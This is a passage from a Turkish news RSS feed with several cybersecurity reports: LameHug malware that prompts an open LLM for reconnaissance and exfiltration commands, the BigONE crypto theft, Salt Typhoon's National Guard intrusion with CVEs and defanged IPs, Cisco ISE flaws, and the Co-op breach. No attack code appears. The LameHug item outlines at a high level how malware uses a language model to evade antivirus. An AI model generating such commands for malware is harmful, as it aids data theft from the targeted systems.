<description><![CDATA[ Ukrayna&#039;nın siber olay müdahale ekibi CERT-UA tarafından tespit edilen LameHug adlı zararlı yazılım, yapay zekâ modeli Qwen 2.5-Coder aracılığıyla gerçek zamanlı olarak komut üreterek Windows sistemlerde veri topluyor. Zararlı yazılımın Rusya bağlantılı APT28 grubu tarafından kullanıldığı belirtiliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d33b20233.webp" length="41296" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:31:23 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>LameHug nasıl çalışıyor, yapay zekâ bu saldırılarda nasıl kullanılıyor, saldırıdan kimler sorumlu tutuluyor, bu yöntem güvenlik yazılımlarını nasıl atlatıyor</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="467" data-end="843">Ukrayna Ulusal Siber Olay Müdahale Ekibi (CERT-UA), yapay zekâ destekli komutlar kullanarak Windows sistemlerinde veri hırsızlığı gerçekleştiren yeni bir zararlı yazılım ailesi olan <strong data-start="649" data-end="660">LameHug</strong>’u keşfetti. Python ile yazılan zararlı yazılım, <strong data-start="709" data-end="778">Alibaba Cloud tarafından geliştirilen Qwen 2.5-Coder-32B-Instruct</strong> adlı açık kaynaklı büyük dil modeli (LLM) ile entegre çalışıyor.</p>
<p data-start="845" data-end="1286">CERT-UA, 10 Temmuz 2025 tarihinde hükümet kurumlarına gönderilen sahte e-postalar üzerinden yürütülen saldırılar hakkında aldığı ihbarlar sonrasında LameHug’u tespit etti. Saldırılarda, Ukrayna hükümet yetkilileri gibi davranan saldırganlar, hedeflere zararlı yazılım içeren ZIP dosyaları gönderdi. Bu eklentiler arasında “<strong data-start="1168" data-end="1186">Attachment.pif</strong>”, “<strong data-start="1190" data-end="1237">AI_generator_uncensored_Canvas_PRO_v0.9.exe</strong>” ve “<strong data-start="1243" data-end="1255">image.py</strong>” isimli yükleyiciler yer aldı.</p>
<p data-start="1288" data-end="1638"><strong data-start="1288" data-end="1336">Komutlar yapay zekâ tarafından oluşturuluyor</strong><br data-start="1336" data-end="1339">LameHug’un en dikkat çekici özelliği, sabit kodlu komutlar yerine, Hugging Face platformu aracılığıyla LLM modeli kullanarak <strong data-start="1464" data-end="1530">dinamik olarak sistem keşif ve veri toplama komutları üretmesi</strong>. Yapay zekâya gönderilen doğal dil girdileri sonucunda elde edilen komutlar, hedef sistemde çalıştırılarak:</p>
<ul data-start="1640" data-end="1879">
<li data-start="1640" data-end="1700">
<p data-start="1642" data-end="1700">Sistem bilgileri <code data-start="1659" data-end="1669">info.txt</code> adlı bir dosyada toplanıyor,</p>
</li>
<li data-start="1701" data-end="1794">
<p data-start="1703" data-end="1794">Kullanıcının “Documents”, “Desktop” ve “Downloads” klasörlerinde belge araması yapılıyor,</p>
</li>
<li data-start="1795" data-end="1879">
<p data-start="1797" data-end="1879">Elde edilen veriler <strong data-start="1817" data-end="1825">SFTP</strong> veya <strong data-start="1831" data-end="1844">HTTP POST</strong> yoluyla dış sunuculara iletiliyor.</p>
</li>
</ul>
<p data-start="1881" data-end="2101">Bu yöntem, zararlı yazılımın yeni komutlar veya güncellemeler almadan saldırı senaryolarını olay anında değiştirebilmesini sağlıyor. Aynı zamanda sabit komutları arayan antivirüs çözümlerini atlatmayı da kolaylaştırıyor.</p>
<p data-start="2103" data-end="2389"><strong data-start="2103" data-end="2141">Saldırılar APT28 grubuna atfedildi</strong><br data-start="2141" data-end="2144">CERT-UA, bu faaliyetleri <strong data-start="2169" data-end="2200">Rusya devlet destekli APT28</strong> grubu ile <strong data-start="2211" data-end="2242">orta düzeyde güvenilirlikle</strong> ilişkilendiriyor. APT28, daha önce Sednit, Fancy Bear, STRONTIUM ve Pawn Storm gibi isimlerle de bilinen köklü bir tehdit aktörü olarak tanınıyor.</p>
<p data-start="2391" data-end="2796"><strong data-start="2391" data-end="2438">Yeni bir siber saldırı paradigması olabilir</strong><br data-start="2438" data-end="2441">LameHug, kamuya açık olarak belgelenmiş ilk <strong data-start="2485" data-end="2517">LLM destekli zararlı yazılım</strong> olma özelliğini taşıyor. Uzmanlara göre bu tür saldırılar, tehdit aktörlerinin daha esnek, dinamik ve tespit edilmesi zor siber operasyonlar yürütmesine imkân tanıyor. Ayrıca Hugging Face gibi meşru altyapılar kullanılarak komut ve kontrol iletişimi daha gizli hale getiriliyor.</p>
<p data-start="2798" data-end="2941">CERT-UA, yapay zekâ modeli tarafından oluşturulan komutların sistemde başarıyla çalıştırılıp çalıştırılamadığına dair net bir bilgi paylaşmadı.</p>
<p data-start="2948" data-end="3122"><strong data-start="2948" data-end="2960"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>BigONE kripto para borsası saldırıya uğradı, sıcak cüzdandan 27 milyon dolar çalındı</title>
<link>https://www.ajansexpres.com.tr/bigone-kripto-para-borsasi-saldiriya-ugradi-sicak-cuzdandan-27-milyon-dolar-calindi</link>
<guid>https://www.ajansexpres.com.tr/bigone-kripto-para-borsasi-saldiriya-ugradi-sicak-cuzdandan-27-milyon-dolar-calindi</guid>
<description><![CDATA[ Kripto para borsası BigONE, 16 Temmuz’da gerçekleşen siber saldırıda sıcak cüzdanlarının hedef alındığını ve toplamda 27 milyon dolar değerinde dijital varlığın çalındığını açıkladı. Şirket, kullanıcı varlıklarının etkilenmediğini ve zararların rezerflerden karşılanacağını duyurdu. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d3372dc56.webp" length="43992" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:31:19 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Saldırganlar BigONEa nasıl sızdı, çalınan kripto paralar nasıl dönüştürüldü, kullanıcılar zarar görecek mi, 2025te kripto hırsızlıkları neden arttı</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="428" data-end="724">Kripto para borsası <strong data-start="448" data-end="458">BigONE</strong>, 16 Temmuz 2025’te gerçekleşen bir siber saldırı sonucu yaklaşık <strong data-start="524" data-end="543">27 milyon dolar</strong> değerinde dijital varlığın çalındığını duyurdu. Şirket tarafından yapılan açıklamada, kullanıcıların kişisel verileri ve özel anahtarlarının bu saldırıdan etkilenmediği belirtildi.</p>
<p data-start="726" data-end="1015">BigONE, saldırının erken saatlerinde platform üzerindeki bazı varlıklarda olağandışı hareketler tespit edildiğini ve yapılan inceleme sonucunda bunun üçüncü taraf kaynaklı bir saldırı olduğunun belirlendiğini bildirdi. Saldırıdan yalnızca <strong data-start="965" data-end="981">sıcak cüzdan</strong> sisteminin etkilendiği açıklandı.</p>
<p data-start="1017" data-end="1301"><strong data-start="1017" data-end="1054">Zarar kullanıcıya yansıtılmayacak</strong><br data-start="1054" data-end="1057">Şirket, yaşanan kaybın platform rezervlerinden karşılanacağını ve hiçbir kullanıcının zarar görmeyeceğini belirtti:<br data-start="1172" data-end="1175">“BigONE, bu olaydan doğan tüm kayıpları tamamen karşılayacaktır. Kullanıcı varlıkları üzerinde maddi bir etki oluşmayacaktır.”</p>
<p data-start="1303" data-end="1627"><strong data-start="1303" data-end="1341">Tedarik zinciri saldırısı ihtimali</strong><br data-start="1341" data-end="1344">Siber güvenlik firması <strong data-start="1367" data-end="1379">SlowMist</strong> ile iş birliği yapan BigONE, saldırının izini blockchain üzerinde sürmeye başladığını duyurdu. Ancak saldırının teknik detayları henüz kamuoyuyla paylaşılmadı. SlowMist yetkilileri, olayın bir <strong data-start="1573" data-end="1602">tedarik zinciri saldırısı</strong> olabileceğini öne sürdü.</p>
<p data-start="1629" data-end="1832">Blockchain analiz platformu <strong data-start="1657" data-end="1672">Lookonchain</strong>, saldırganların çalınan dijital varlıkları hızla dönüştürdüğünü ve bunların 120 Bitcoin, 1.272 Ether, 2.625 Solana ve 23,3 milyon Tron'a çevrildiğini bildirdi.</p>
<p data-start="1834" data-end="2175"><strong data-start="1834" data-end="1866">Sektörel etkiler ve yorumlar</strong><br data-start="1866" data-end="1869">Blockchain suç araştırmacısı <strong data-start="1898" data-end="1909">ZachXBT</strong>, olayla ilgili yaptığı değerlendirmede, BigONE’un geçmişte dolandırıcılık kaynaklı kripto paraların işlendiği bir platform olarak da bilindiğine dikkat çekerek, bu tür saldırıların kripto ekosisteminde doğal bir “temizlenme” sürecini tetikleyebileceğini ifade etti.</p>
<p data-start="2177" data-end="2510"><strong data-start="2177" data-end="2221">2025’te kripto hırsızlıkları rekor kırdı</strong><br data-start="2221" data-end="2224">Olay, kripto sektöründe yaşanan genel artışın ortasında gerçekleşti. <strong data-start="2293" data-end="2308">Chainalysis</strong> tarafından yayımlanan 2025 yıl ortası raporuna göre, bu yıl şimdiye kadar <strong data-start="2383" data-end="2421">2,17 milyar dolarlık kripto varlık</strong> çalındı. Bu rakam, 2024 yılının tamamında gerçekleşen kayıpların üzerine çıkmış durumda.</p>
<p data-start="2512" data-end="2794">Raporda, Kuzey Kore bağlantılı aktörlerin <strong data-start="2554" data-end="2563">ByBit</strong> borsasından yapılan 1,5 milyar dolarlık saldırıyla bu yılın en büyük faillerinden biri haline geldiği vurgulandı. Ayrıca kişisel cüzdanlara yönelik saldırıların da artışta olduğu ve toplam kaybın %23,35’ini oluşturduğu belirtildi.</p>
<p data-start="2796" data-end="2961">Chainalysis ayrıca kripto hırsızlıklarında <strong data-start="2839" data-end="2883">fiziksel şiddet olaylarının da arttığını</strong> ve bunun Bitcoin fiyatlarındaki yükselişle bağlantılı olabileceğini bildirdi.</p>
<p data-start="2968" data-end="3134"><strong data-start="2968" data-end="2980"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>ABD Şokta! Salt Typhoon 9 Ay Boyunca Ağa Sızdı, Tüm Yapılandırmaları Ele Geçirdi</title>
<link>https://www.ajansexpres.com.tr/abd-sokta-salt-typhoon-9-ay-boyunca-aga-sizdi-tum-yapilandirmalari-ele-gecirdi</link>
<guid>https://www.ajansexpres.com.tr/abd-sokta-salt-typhoon-9-ay-boyunca-aga-sizdi-tum-yapilandirmalari-ele-gecirdi</guid>
<description><![CDATA[ Çin devleti destekli Salt Typhoon adlı siber casusluk grubu, 2024 yılı boyunca ABD&#039;deki bir eyaletin Ulusal Muhafız ağına sızarak dokuz ay boyunca tespit edilmeden kaldı. Grup, yönetici kimlik bilgileri ve ağ şemaları da dahil olmak üzere kritik yapılandırma verilerini ele geçirdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d33330194.webp" length="21714" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:31:15 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Salt Typhoon nasıl sızdı, hangi veriler ele geçirildi, saldırı diğer eyaletleri nasıl etkileyebilir, DHS hangi güvenlik açıkları konusunda uyarıyor, ABD Şokta! Salt Typhoon 9 Ay Boyunca Ağa Sızdı</media:keywords>
<content:encoded><![CDATA[<p>ABD İç Güvenlik Bakanlığı’nın (DHS) 11 Haziran 2025 tarihli bir notuna göre,<span> </span><strong>Salt Typhoon</strong><span> </span>adlı Çin bağlantılı siber casusluk grubu,<span> </span><strong>2024 yılı Mart ile Aralık ayları arasında</strong><span> </span>bir ABD eyaletinin Ulusal Muhafız (Army National Guard) ağına sızdı. Saldırganların, söz konusu süre boyunca fark edilmeden sistemde kaldığı ve kritik veriler topladığı tespit edildi.</p>
<p><strong>Salt Typhoon</strong>, Çin Devlet Güvenlik Bakanlığı (MSS) ile bağlantılı olduğu düşünülen ve daha önce dünya genelinde telekom altyapılarına yönelik saldırılarla adını duyuran bir grup. Grup, AT&T, Verizon, Viasat gibi birçok şirketi daha önce hedef almış ve ABD hükümetiyle bağlantılı haberleşme verilerine erişim sağlamayı amaçlamıştı.</p>
<p><strong>Ağ yapılandırmaları ve kimlik bilgileri ele geçirildi</strong><br>DHS’nin notuna göre, Salt Typhoon’un bu saldırıda elde ettiği veriler arasında:</p>
<ul>
<li>Ağ şemaları,</li>
<li>Yapılandırma dosyaları,</li>
<li>Sistem yöneticisi kimlik bilgileri,</li>
<li>Ulusal Muhafız personeline ait kişisel bilgiler yer alıyor.</li>
</ul>
<p>Bu bilgiler, yalnızca hedef alınan eyaletle sınırlı kalmadı. Ulusal Muhafız’ın diğer eyaletler ve en az dört ABD bölgesiyle olan veri trafiği de saldırganlar tarafından izlendi. Saldırganların, bu verileri kullanarak diğer eyalet ve federal ağlara da sızma amacı taşıdığı belirtiliyor.</p>
<p>DHS notunda, grubun daha önce benzer yapılandırma dosyalarını kullanarak başka devlet kurumlarında güvenlik açıklarını tespit ettiği ve yeni saldırılar gerçekleştirdiği bilgisi de yer aldı. Ocak–Mart 2024 döneminde ABD’de iki eyalet kurumundan daha benzer verilerin sızdırıldığı ifade edildi.</p>
<p><strong>Saldırganlar eski güvenlik açıklarını hedef aldı</strong><br>Saldırının nasıl gerçekleştiği belirtilmese de, Salt Typhoon’un daha önce şu güvenlik açıklarını istismar ettiği biliniyor:</p>
<ul>
<li><strong>CVE-2018-0171:</strong><span> </span>Cisco IOS Smart Install açığı</li>
<li><strong>CVE-2023-20198:</strong><span> </span>Cisco IOS XE web arayüzüne yetkisiz erişim sağlayan sıfır gün açığı</li>
<li><strong>CVE-2023-20273:</strong><span> </span>Cisco IOS XE’de ayrıcalık yükseltme zafiyeti</li>
<li><strong>CVE-2024-3400:</strong><span> </span>Palo Alto PAN-OS’ta komut enjeksiyonu açığı</li>
</ul>
<p>DHS, saldırılarda kullanılan bazı IP adreslerini de paylaştı:<br><code>43.254.132[.]118</code>,<span> </span><code>146.70.24[.]144</code>,<span> </span><code>176.111.218[.]190</code>,<span> </span><code>113.161.16[.]130</code>,<span> </span><code>23.146.242[.]131</code>,<span> </span><code>58.247.195[.]208</code></p>
<p>Grubun daha önce siyasi kampanyaları ve yasa koyucuları hedef alan telekom altyapılarına sızarak iletişimleri izlediği ve bu süreçte<span> </span><strong>JumblePath</strong><span> </span>ve<span> </span><strong>GhostSpider</strong><span> </span>adlı özel yazılımlar kullandığı da biliniyor.</p>
<p><strong>DHS’den önlem çağrısı</strong><br>İç Güvenlik Bakanlığı, federal ve eyalet düzeyindeki siber güvenlik ekiplerine şu önlemleri almaları çağrısında bulundu:</p>
<ul>
<li>İlgili açıkların kapatılması,</li>
<li>Gereksiz servislerin devre dışı bırakılması,</li>
<li>SMB trafiğinin segmentasyonu,</li>
<li>SMB imzalamanın zorunlu kılınması,</li>
<li>Erişim kontrollerinin sıkılaştırılması.</li>
</ul>
<p>Ulusal Muhafız Bürosu, ihlali doğruladı ancak hangi eyaletin etkilendiği veya olayın operasyonlara etkisi hakkında ayrıntı paylaşmadı. Çin’in Washington Büyükelçiliği ise saldırıyı doğrudan reddetmedi ancak Salt Typhoon’un Çin devletiyle bağlantılı olduğuna dair “kesin ve güvenilir bir kanıt” sunulmadığını savundu.</p>
<p>Kaynak: CUMHA - CUMHUR HABER AJANSI</p>]]> </content:encoded>
</item>

<item>
<title>Cisco ISE sisteminde keşfedilen kritik açık, kimlik doğrulama öncesi komut çalıştırmaya izin veriyor</title>
<link>https://www.ajansexpres.com.tr/cisco-ise-sisteminde-kesfedilen-kritik-acik-kimlik-dogrulama-oencesi-komut-calistirmaya-izin-veriyor</link>
<guid>https://www.ajansexpres.com.tr/cisco-ise-sisteminde-kesfedilen-kritik-acik-kimlik-dogrulama-oencesi-komut-calistirmaya-izin-veriyor</guid>
<description><![CDATA[ Cisco’nun kimlik doğrulama ve erişim kontrol sistemi ISE’de tespit edilen CVE-2025-20337 kodlu güvenlik açığı, uzaktan kimliği doğrulanmamış saldırganların zararlı dosya yüklemesine, komut çalıştırmasına veya root yetkisi elde etmesine olanak tanıyor. Şirket, etkilenen sürümler için acil yama çağrısı yaptı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d32f8d4d1.webp" length="36072" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:31:11 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>CVE-2025-20337 açığı nasıl çalışıyor, hangi Cisco sürümleri etkileniyor, hangi yamalar yüklenmeli, diğer güvenlik açıkları hangi ürünleri etkiliyor</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="470" data-end="781">Cisco, <strong data-start="477" data-end="511">Identity Services Engine (ISE)</strong> platformunu etkileyen ve <strong data-start="537" data-end="583">azami kritiklik puanı olan 10 üzerinden 10</strong> ile derecelendirilen yeni bir güvenlik açığı hakkında uyarıda bulundu. <strong data-start="655" data-end="673">CVE-2025-20337</strong> koduyla izlenen bu açıklık, kullanıcıdan gelen verilerin yeterince doğrulanmaması nedeniyle ortaya çıkıyor.</p>
<p data-start="783" data-end="976">Zafiyet, Japonya merkezli GMO Cybersecurity by Ierae şirketinden araştırmacı <strong data-start="860" data-end="878">Kentaro Kawane</strong> tarafından keşfedildi ve <strong data-start="904" data-end="945">Trend Micro Zero Day Initiative (ZDI)</strong> üzerinden Cisco’ya bildirildi.</p>
<p data-start="978" data-end="1213">Açık, <strong data-start="984" data-end="1031">uzaktan ve kimlik doğrulaması gerekmeksizin</strong> istismar edilebiliyor. Saldırganlar, özel olarak hazırlanmış API istekleriyle sistem üzerinde zararlı dosya yükleyip keyfi komut çalıştırabiliyor ya da root yetkisi elde edebiliyor.</p>
<p data-start="1215" data-end="1556"><strong data-start="1215" data-end="1252">Etkilenen sürümler ve düzeltmeler</strong><br data-start="1252" data-end="1255">Zafiyet, <strong data-start="1264" data-end="1321">Cisco ISE ve ISE-PIC 3.3 ve 3.4 sürümlerini etkiliyor</strong>. Daha önce bildirilen CVE-2025-20281 ve CVE-2025-20282 açıklarıyla birlikte değerlendirildiğinde, bu sürümler tümüyle risk altında bulunuyor. Cisco, bu üç kritik açığın birbirinden bağımsız şekilde istismar edilebileceğini belirtiyor.</p>
<p data-start="1558" data-end="1626">Yalnızca aşağıdaki sürümlerde tüm kritik açıklar kapatılmış durumda:</p>
<div class="_tableContainer_80l1q_1">
<div class="_tableWrapper_80l1q_14 group flex w-fit flex-col-reverse" tabindex="-1">
<table data-start="1628" data-end="1997" class="w-fit min-w-(--thread-content-width)">
<thead data-start="1628" data-end="1701">
<tr data-start="1628" data-end="1701">
<th data-start="1628" data-end="1649" data-col-size="sm">Ürün Sürümü</th>
<th data-start="1649" data-end="1666" data-col-size="sm">CVE-2025-20281</th>
<th data-start="1666" data-end="1683" data-col-size="sm">CVE-2025-20282</th>
<th data-start="1683" data-end="1701" data-col-size="sm">CVE-2025-20337</th>
</tr>
</thead>
<tbody data-start="1776" data-end="1997">
<tr data-start="1776" data-end="1849">
<td data-start="1776" data-end="1797" data-col-size="sm">ISE 3.2 ve öncesi</td>
<td data-start="1797" data-end="1814" data-col-size="sm">Etkilenmiyor</td>
<td data-start="1814" data-end="1831" data-col-size="sm">Etkilenmiyor</td>
<td data-start="1831" data-end="1849" data-col-size="sm">Etkilenmiyor</td>
</tr>
<tr data-start="1850" data-end="1923">
<td data-start="1850" data-end="1871" data-col-size="sm">ISE 3.3</td>
<td data-start="1871" data-end="1888" data-col-size="sm">Patch 7</td>
<td data-start="1888" data-end="1905" data-col-size="sm">Etkilenmiyor</td>
<td data-start="1905" data-end="1923" data-col-size="sm">Patch 7</td>
</tr>
<tr data-start="1924" data-end="1997">
<td data-start="1924" data-end="1945" data-col-size="sm">ISE 3.4</td>
<td data-start="1945" data-end="1962" data-col-size="sm">Patch 2</td>
<td data-start="1962" data-end="1979" data-col-size="sm">Patch 2</td>
<td data-start="1979" data-end="1997" data-col-size="sm">Patch 2</td>
</tr>
</tbody>
</table>
<div class="sticky end-(--thread-content-margin) h-0 self-end select-none">
<div class="absolute end-0 flex items-end"><span class="" data-state="closed"><button aria-label="Tabloyu kopyala" class="hover:bg-token-bg-tertiary text-token-text-secondary my-1 rounded-sm p-1 transition-opacity group-[:not(:hover):not(:focus-within)]:pointer-events-none group-[:not(:hover):not(:focus-within)]:opacity-0"><svg width="20" height="20" viewbox="0 0 20 20" fill="currentColor" xmlns=" class="icon"><path d="M12.668 10.667C12.668 9.95614 12.668 9.46258 12.6367 9.0791C12.6137 8.79732 12.5758 8.60761 12.5244 8.46387L12.4688 8.33399C12.3148 8.03193 12.0803 7.77885 11.793 7.60254L11.666 7.53125C11.508 7.45087 11.2963 7.39395 10.9209 7.36328C10.5374 7.33197 10.0439 7.33203 9.33301 7.33203H6.5C5.78896 7.33203 5.29563 7.33195 4.91211 7.36328C4.63016 7.38632 4.44065 7.42413 4.29688 7.47559L4.16699 7.53125C3.86488 7.68518 3.61186 7.9196 3.43555 8.20703L3.36524 8.33399C3.28478 8.49198 3.22795 8.70352 3.19727 9.0791C3.16595 9.46259 3.16504 9.95611 3.16504 10.667V13.5C3.16504 14.211 3.16593 14.7044 3.19727 15.0879C3.22797 15.4636 3.28473 15.675 3.36524 15.833L3.43555 15.959C3.61186 16.2466 3.86474 16.4807 4.16699 16.6348L4.29688 16.6914C4.44063 16.7428 4.63025 16.7797 4.91211 16.8027C5.29563 16.8341 5.78896 16.835 6.5 16.835H9.33301C10.0439 16.835 10.5374 16.8341 10.9209 16.8027C11.2965 16.772 11.508 16.7152 11.666 16.6348L11.793 16.5645C12.0804 16.3881 12.3148 16.1351 12.4688 15.833L12.5244 15.7031C12.5759 15.5594 12.6137 15.3698 12.6367 15.0879C12.6681 14.7044 12.668 14.211 12.668 13.5V10.667ZM13.998 12.665C14.4528 12.6634 14.8011 12.6602 15.0879 12.6367C15.4635 12.606 15.675 12.5492 15.833 12.4688L15.959 12.3975C16.2466 12.2211 16.4808 11.9682 16.6348 11.666L16.6914 11.5361C16.7428 11.3924 16.7797 11.2026 16.8027 10.9209C16.8341 10.5374 16.835 10.0439 16.835 9.33301V6.5C16.835 5.78896 16.8341 5.29563 16.8027 4.91211C16.7797 4.63025 16.7428 4.44063 16.6914 4.29688L16.6348 4.16699C16.4807 3.86474 16.2466 3.61186 15.959 3.43555L15.833 3.36524C15.675 3.28473 15.4636 3.22797 15.0879 3.19727C14.7044 3.16593 14.211 3.16504 13.5 3.16504H10.667C9.9561 3.16504 9.46259 3.16595 9.0791 3.19727C8.79739 3.22028 8.6076 3.2572 8.46387 3.30859L8.33399 3.36524C8.03176 3.51923 7.77886 3.75343 7.60254 4.04102L7.53125 4.16699C7.4508 4.32498 7.39397 4.53655 7.36328 4.91211C7.33985 5.19893 7.33562 5.54719 7.33399 6.00195H9.33301C10.022 6.00195 10.5791 6.00131 11.0293 6.03809C11.4873 6.07551 11.8937 6.15471 12.2705 6.34668L12.4883 6.46875C12.984 6.7728 13.3878 7.20854 13.6533 7.72949L13.7197 7.87207C13.8642 8.20859 13.9292 8.56974 13.9619 8.9707C13.9987 9.42092 13.998 9.97799 13.998 10.667V12.665ZM18.165 9.33301C18.165 10.022 18.1657 10.5791 18.1289 11.0293C18.0961 11.4302 18.0311 11.7914 17.8867 12.1279L17.8203 12.2705C17.5549 12.7914 17.1509 13.2272 16.6553 13.5313L16.4365 13.6533C16.0599 13.8452 15.6541 13.9245 15.1963 13.9619C14.8593 13.9895 14.4624 13.9935 13.9951 13.9951C13.9935 14.4624 13.9895 14.8593 13.9619 15.1963C13.9292 15.597 13.864 15.9576 13.7197 16.2939L13.6533 16.4365C13.3878 16.9576 12.9841 17.3941 12.4883 17.6982L12.2705 17.8203C11.8937 18.0123 11.4873 18.0915 11.0293 18.1289C10.5791 18.1657 10.022 18.165 9.33301 18.165H6.5C5.81091 18.165 5.25395 18.1657 4.80371 18.1289C4.40306 18.0962 4.04235 18.031 3.70606 17.8867L3.56348 17.8203C3.04244 17.5548 2.60585 17.151 2.30176 16.6553L2.17969 16.4365C1.98788 16.0599 1.90851 15.6541 1.87109 15.1963C1.83431 14.746 1.83496 14.1891 1.83496 13.5V10.667C1.83496 9.978 1.83432 9.42091 1.87109 8.9707C1.90851 8.5127 1.98772 8.10625 2.17969 7.72949L2.30176 7.51172C2.60586 7.0159 3.04236 6.6122 3.56348 6.34668L3.70606 6.28027C4.04237 6.136 4.40303 6.07083 4.80371 6.03809C5.14051 6.01057 5.53708 6.00551 6.00391 6.00391C6.00551 5.53708 6.01057 5.14051 6.03809 4.80371C6.0755 4.34588 6.15483 3.94012 6.34668 3.56348L6.46875 3.34473C6.77282 2.84912 7.20856 2.44514 7.72949 2.17969L7.87207 2.11328C8.20855 1.96886 8.56979 1.90385 8.9707 1.87109C9.42091 1.83432 9.978 1.83496 10.667 1.83496H13.5C14.1891 1.83496 14.746 1.83431 15.1963 1.87109C15.6541 1.90851 16.0599 1.98788 16.4365 2.17969L16.6553 2.30176C17.151 2.60585 17.5548 3.04244 17.8203 3.56348L17.8867 3.70606C18.031 4.04235 18.0962 4.40306 18.1289 4.80371C18.1657 5.25395 18.165 5.81091 18.165 6.5V9.33301Z"></path></svg></button></span></div>
</div>
Cisco, bu açıklar için herhangi bir <strong data-start="2035" data-end="2064">geçici çözüm (workaround)</strong> bulunmadığını, yalnızca sürüm yükselterek korunmanın mümkün olduğunu vurguladı.</div>
</div>
<p data-start="2146" data-end="2330"><strong data-start="2146" data-end="2196">Daha düşük seviyeli diğer açıklar da duyuruldu</strong><br data-start="2196" data-end="2199">Cisco ayrıca, farklı ürünlerde tespit edilen ve orta-yüksek seviyede risk taşıyan şu açıklar için de güvenlik bültenleri yayımladı:</p>
<ul data-start="2332" data-end="2914">
<li data-start="2332" data-end="2496">
<p data-start="2334" data-end="2496"><strong data-start="2334" data-end="2353">CVE-2025-20274:</strong> Cisco Unified Intelligence Center’da, kimliği doğrulanmış kullanıcıların root seviyesinde zararlı dosya yükleyip çalıştırabileceği bir açık.</p>
</li>
<li data-start="2497" data-end="2648">
<p data-start="2499" data-end="2648"><strong data-start="2499" data-end="2518">CVE-2025-20272:</strong> Cisco Prime Infrastructure ve EPNM sistemlerinde REST API üzerinden veri sızdırılmasına neden olabilecek SQL enjeksiyonu açığı.</p>
</li>
<li data-start="2649" data-end="2813">
<p data-start="2651" data-end="2813"><strong data-start="2651" data-end="2684">CVE-2025-20283, 20284, 20285:</strong> Cisco ISE sistemlerinde, yetkili kullanıcıların root komutları çalıştırabileceği ve IP kısıtlamalarını aşabileceği açıklıklar.</p>
</li>
<li data-start="2814" data-end="2914">
<p data-start="2816" data-end="2914"><strong data-start="2816" data-end="2835">CVE-2025-20288:</strong> Unified Intelligence Center’da kimlik doğrulaması gerektirmeyen SSRF zafiyeti.</p>
</li>
</ul>
<p data-start="2916" data-end="3115">Bu açıklar için de yamaların yayımlandığı, fakat <strong data-start="2965" data-end="3009">hiçbirinde geçici önlemlerin bulunmadığı</strong> belirtildi. Cisco, yükseltme öncesinde sistem gereksinimlerinin karşılandığının test edilmesini öneriyor.</p>
<hr data-start="3117" data-end="3120">
<p data-start="3122" data-end="3286"><strong data-start="3122" data-end="3134"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Co&#45;op, 6.5 milyon üyenin kişisel verilerinin siber saldırıda ele geçirildiğini doğruladı</title>
<link>https://www.ajansexpres.com.tr/co-op-65-milyon-uyenin-kisisel-verilerinin-siber-saldirida-ele-gecirildigini-dogruladi</link>
<guid>https://www.ajansexpres.com.tr/co-op-65-milyon-uyenin-kisisel-verilerinin-siber-saldirida-ele-gecirildigini-dogruladi</guid>
<description><![CDATA[ Birleşik Krallık’ın en büyük tüketici kooperatiflerinden Co-op, Nisan 2025’te yaşanan siber saldırıda 6,5 milyon üyeye ait kişisel verilerin kopyalandığını açıkladı. DragonForce fidye yazılımıyla bağlantılı saldırının sosyal mühendislik yoluyla başlatıldığı, olayın Scattered Spider grubu ile ilişkilendirildiği bildirildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d32b8dd4e.webp" length="30764" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:31:07 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Co-op üyelerinin hangi verileri sızdırıldı, saldırı nasıl gerçekleştirildi, saldırganlar kimlerle bağlantılı, NCA kimleri gözaltına aldı</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="473" data-end="816">Birleşik Krallık merkezli perakende zinciri <strong data-start="517" data-end="547">Co-op (Co-operative Group)</strong>, Nisan ayında gerçekleşen siber saldırı sonucu <strong data-start="595" data-end="649">6,5 milyon üyeye ait kişisel verilerin çalındığını</strong> resmen duyurdu. Şirket CEO’su <strong data-start="680" data-end="702">Shirine Khoury-Haq</strong>, BBC Breakfast programında yaptığı açıklamada, saldırganların tüm üye verilerine erişip kopyaladığını ifade etti.</p>
<blockquote data-start="818" data-end="1011">
<p data-start="820" data-end="1011">“Veriler kopyalandı ve saldırganlar bunlara erişim sağladı. Bu durum, diğer kuruluşlarda yaşanan siber saldırılarla aynı şekilde işledi. Bu, maalesef olayın en korkunç yanı,” dedi Khoury-Haq.</p>
</blockquote>
<p data-start="1013" data-end="1175">Şirket, herhangi bir finansal bilgi veya işlem verisinin sızdırılmadığını belirtse de, üyelerin <strong data-start="1109" data-end="1131">iletişim bilgileri</strong>nin saldırganların eline geçtiği doğrulandı.</p>
